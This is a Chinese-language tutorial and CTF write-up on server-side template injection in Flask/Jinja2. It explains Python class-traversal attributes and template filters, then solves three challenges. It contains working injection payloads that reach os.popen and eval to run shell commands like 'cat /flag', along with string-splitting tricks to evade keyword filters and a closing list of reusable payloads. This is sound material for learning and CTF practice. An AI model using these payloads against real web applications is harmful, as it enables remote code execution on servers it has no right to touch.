初识SSTI

什么是SSTI?

  • SSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞。
  • 可能SSTI对大家而言不是很熟悉,但是相信大家很熟悉SQL注入。实际上这两者的思路都是相同的,因此可以类比来分析

引发SSTI的真正原因

  • render_template渲染函数的问题
  • 渲染函数在渲染的时候,往往对用户输入的变量不做渲染。
  • 也就是说例如:{{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{1+1}}会被解析成2。如此一来就可以实现如同sql注入一样的注入漏洞。

判断SSTI类型

  • 上面提到网站模板引擎有jinja2、tornado、smarty、twig等等,那么如何判断遇到的是哪种类型?
  • 广为流传的就是这张图了,根据处理返回值的不同来进行判别。(注意括号的数量等)

dceb425de4394352b02eda8462178145.png

常用类

__class__

  • __class__用来查看变量所属的类,格式为变量.__class__
>>> ''.__class__
<class 'str'>
>>> ().__class__
<class 'tuple'>
>>> {}.__class__
<class 'dict'>
>>> [].__class__
<class 'list'>

__bases__

  • __bases__用来查看类的基类,注意是类的基类,所以格式为变量.__class__.__bases__
>>> ''.__class__.__bases__
(<class 'object'>,)
>>> ().__class__.__bases__
(<class 'object'>,)
>>> {}.__class__.__bases__
(<class 'object'>,)
>>> [].__class__.__bases__
(<class 'object'>,)
  • 同时也能加上数组,比如变量.__class__.__bases__[0]来获得第一个基类。
  • 值得一提的是还有个类是__mro__,它会显示类和基类,这是它和__bases__的不同。
>>> ''.__class__.__mro__
(<class 'str'>, <class 'object'>)

__subclasses__()

  • __subclasses__()查看当前类的子类,格式变量.__class__.__bases__[0].__subclasses__()
  • 这个类也可以加数组来查看指定的索引值,例如变量.__class__.__bases__[0].__subclasses__()[1]

ceed2610fe2e4ed2b57f657a692463a0.png

>>> ''.__class__.__bases__[0].__subclasses__()[0]
<class 'type'>

这个时候就可以开始利用类里面的方法了。

  • 示例:变量.__class__.__bases__[0].__subclasses__()[138].__init__.__globals____init__初始化类,然后__globals__全局来查找所有的方法及变量及参数。
  • 由此我们可以看到各种各样的参数方法函数,去找一个可利用的function来执行,比如popen的话,就可以这样利用:''.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['popen']('dir').read()
  • 大概是这么个原理,但这样说来还是不知道怎么利用,来看几道题就能更深刻理解了。

类的知识总结

关键词 解释
__class__ 类的一个内置属性,表示实例对象的类。
__base__ 类型对象的直接基类
__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
__mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
__subclasses__() 返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__ 初始化类,返回的类型是function
__globals__ 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__ 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__() 实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__() 调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
__builtins__ 内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
__import__ 动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
__str__() 返回描写这个对象的字符串,可以理解成就是打印出来。
url_for flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
lipsum flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
current_app 应用上下文,一个全局变量。
request 可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1 get传参
request.values.x1 所有参数
request.cookies cookies参数
request.headers 请求头参数
request.form.x1 post传参 (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data post传参 (Content-Type:a/b)
request.json post传json (Content-Type: application/json)
config 当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g {{g}}得到<flask.g of 'flask_ssti'>

常见过滤器

常用的过滤器 解释
int() 将值转换为int类型
float() 将值转换为float类型
lower() 将字符串转换为小写
upper() 将字符串转换为大写
title() 把值中的每个单词的首字母都转成大写
capitalize() 把变量值的首字母转成大写,其余字母转小写
trim() 截取字符串前面和后面的空白字符
wordcount() 计算一个长字符串中单词的个数
reverse() 字符串反转
replace(value,old,new) 替换将old替换为new的字符串
truncate(value,length=255,killwords=False) 截取length长度的字符串
striptags() 删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格
escape()或e 转义字符,会将<,>等符号转义成HTML中的符号。显例:content|escapecontent|e
safe() 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: {{'<em>hello</em>'|safe}}
list() 将变量列成列表
string() 将变量转换成字符串
join() 将一个序列中的参数值拼接成字符串。示例看上面payload
abs() 返回一个数值的绝对值
first() 返回一个序列的第一个元素
last() 返回一个序列的最后一个元素
format(value,arags,*kwargs) 格式化字符串。比如:{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出:Helloo? - Foo!
length() 返回一个序列或者字典的长度
sum() 返回列表内数值的和
sort() 返回排序后的列表
default(value,default_value,boolean=false) 如果当前变量没有值,则会使用参数中的值来代替。示例:name|default('xiaotuo')----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。
length() 返回字符串的长度,别名是count

CTF例题

[BJDCTF]The mystery of ip

f57bfb012c914b33b1fd99f6861fc7a1.png

  • 进来题目长这样,一看与ip有关,就可以想到可能与X-Forwarded-For或者client-ip有关了

80a453b97f4d4f0ab5b1a8c38b141b03.png

  • 果然这里的IP是可控的,这道题比较有意思就在于:用{7*7}来判断一下发现这里居然是个SSTI注入

01e6b68535fb4dd689667e732fc6016e.png

  • 尝试一下系统命令:{system('ls')},发现是可以使用的

b3b999e902924930b737f329537b2465.png

  • 尝试直接{system('cat /flag')}发现是没有waf的

afec28c4b87546ebb28999a44245a0f2.png

[Bugku]Simple_SSTI_2

  • 进来还是提示要传入?flag=,那就来看一下/?flag={{config}},看到如下内容

6ee4f9c8558847abb320e813f8f6234c.png

  • 没什么有用的,既然如此就用ls来查看一下有哪些文件:/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27ls%27).read()}}

eebfccf5d0d3456c899bf71206c92905.png

  • 直接cat flag完事:/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20flag%27).read()}}

17d07fc1a11942e0bd473869d6161a66.png

Flask Plus-NCTF2018

  • 点击网页上的各个按钮,点击右下角的小圆圈存在跳转,报错:

77623644c7eb7621ac8ce445e4b7070c.png

  • 观察可知,这是直接将URL贴在报错信息中,联想到Flask的模板注入。测试payload:{{7*7}}

7c5cdb7ed4526ac12fc90b37e7a62196.png

  • 经过测试,对一些常用payload的关键词存在检测,使用字符串拼接的办法进行绕过。

  • 获取所有子类:{{''['__cl'+'ass__']['__ba'+'ses__'][0]['__subcl'+'asses__']()}}

  • 利用burp爆破找到可利用的类:{{''['__cl'+'ass__']['__ba'+'ses__'][0]['__subcl'+'asses__']()[0]['__in'+'it__']['__glo'+'bals__']['__bui'+'ltins__']['ev'+'al']("__im"+"port__('o'+'s').po"+"pen('ls /').read()")}}

f3e8464d7642f373804cd5488e495198.png

  • 改命令为cat读取flag{{''['__cl' 'ass__']['__ba' 'ses__'][0]['__subcl' 'asses__']()[100]['__in' 'it__']['__glo' 'bals__']['__bui' 'ltins__']['ev' 'al']("__im" "port__('o' 's').po" "pen('cat /Th1s_is__F1114g').read()")}}

a53357cebe02018758c502d921eddab6.png

参考payload

# i 为整型
{{''['__cl' 'ass__']['__ba' 'ses__'][0]['__subcl' 'asses__']()[i]['__in' 'it__']['__glo' 'bals__']['__bui' 'ltins__']['ev' 'al']("__im" "port__('o' 's').po" "pen('cat /flag').read()")}}

# i 为整型
{{""["__cla""ss__"]["__ba""se__"]["__subcl""asses__"]()[i]["__in""it__"]["__glo""bals__"]["__buil""tins__"]["eval"]("__import__("o""s")")["popen"]("cat /fl""ag")["read"]()}}

参考链接